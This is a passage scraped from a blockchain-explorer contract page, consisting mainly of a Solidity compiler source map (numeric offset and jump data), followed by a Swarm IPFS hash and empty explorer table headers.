-1;1427:248:1:o;1680:328::-;1757:6;1765;1773;1826:2;1814:9;1805:7;1801:23;1797:32;1794:52;;;1842:1;1839;1832:12;1794:52;1865:29;1884:9;1865:29;:::i;:::-;1855:39;;1913:38;1947:2;1936:9;1932:18;1913:38;:::i;:::-;1903:48;;1998:2;1987:9;1983:18;1970:32;1960:42;;1680:328;;;;;:::o;2410:367::-;2473:8;2483:6;2537:3;2530:4;2522:6;2518:17;2514:27;2504:55;;2555:1;2552;2545:12;2504:55;-1:-1:-1;2578:20:1;;2621:18;2610:30;;2607:50;;;2653:1;2650;2643:12;2607:50;2690:4;2682:6;2678:17;2666:29;;2750:3;2743:4;2733:6;2730:1;2726:14;2718:6;2714:27;2710:38;2707:47;2704:67;;;2767:1;2764;2757:12;2704:67;2410:367;;;;;:::o;2782:847::-;2913:6;2921;2929;2937;2945;2998:2;2986:9;2977:7;2973:23;2969:32;2966:52;;;3014:1;3011;3004:12;2966:52;3037:29;3056:9;3037:29;:::i;:::-;3027:39;;3117:2;3106:9;3102:18;3089:32;3140:18;3181:2;3173:6;3170:14;3167:34;;;3197:1;3194;3187:12;3167:34;3236:70;3298:7;3289:6;3278:9;3274:22;3236:70;:::i;:::-;3325:8;;-1:-1:-1;3210:96:1;-1:-1:-1;3413:2:1;3398:18;;3385:32;;-1:-1:-1;3429:16:1;;;3426:36;;;3458:1;3455;3448:12;3426:36;;3497:72;3561:7;3550:8;3539:9;3535:24;3497:72;:::i;:::-;2782:847;;;;-1:-1:-1;2782:847:1;;-1:-1:-1;3588:8:1;;3471:98;2782:847;-1:-1:-1;;;2782:847:1:o;3827:186::-;3886:6;3939:2;3927:9;3918:7;3914:23;3910:32;3907:52;;;3955:1;3952;3945:12;3907:52;3978:29;3997:9;3978:29;:::i;:::-;3968:39;3827:186;-1:-1:-1;;;3827:186:1:o;4018:260::-;4086:6;4094;4147:2;4135:9;4126:7;4122:23;4118:32;4115:52;;;4163:1;4160;4153:12;4115:52;4186:29;4205:9;4186:29;:::i;:::-;4176:39;;4234:38;4268:2;4257:9;4253:18;4234:38;:::i;:::-;4224:48;;4018:260;;;;;:::o;4283:380::-;4362:1;4358:12;;;;4405;;;4426:61;;4480:4;4472:6;4468:17;4458:27;;4426:61;4533:2;4525:6;4522:14;4502:18;4499:38;4496:161;;4579:10;4574:3;4570:20;4567:1;4560:31;4614:4;4611:1;4604:15;4642:4;4639:1;4632:15;4496:161;;4283:380;;;:::o;4668:356::-;4870:2;4852:21;;;4889:18;;;4882:30;4948:34;4943:2;4928:18;;4921:62;5015:2;5000:18;;4668:356::o;5438:127::-;5499:10;5494:3;5490:20;5487:1;5480:31;5530:4;5527:1;5520:15;5554:4;5551:1;5544:15;5570:128;5610:3;5641:1;5637:6;5634:1;5631:13;5628:39;;;5647:18;;:::i;:::-;-1:-1:-1;5683:9:1;;5570:128::o;5703:127::-;5764:10;5759:3;5755:20;5752:1;5745:31;5795:4;5792:1;5785:15;5819:4;5816:1;5809:15;5835:135;5874:3;5895:17;;;5892:43;;5915:18;;:::i;:::-;-1:-1:-1;5962:1:1;5951:13;;5835:135::o;8314:168::-;8354:7;8420:1;8416;8412:6;8408:14;8405:1;8402:21;8397:1;8390:9;8383:17;8379:45;8376:71;;;8427:18;;:::i;:::-;-1:-1:-1;8467:9:1;;8314:168::o;8487:217::-;8527:1;8553;8543:132;;8597:10;8592:3;8588:20;8585:1;8578:31;8632:4;8629:1;8622:15;8660:4;8657:1;8650:15;8543:132;-1:-1:-1;8689:9:1;;8487:217::o;8709:125::-;8749:4;8777:1;8774;8771:8;8768:34;;;8782:18;;:::i;:::-;-1:-1:-1;8819:9:1;;8709:125::o

Swarm Source

ipfs://5930b4b586075dad3f0b685d19bec621d658b77fee93c16ba099c40a03975334

Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
Loading...
Loading
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.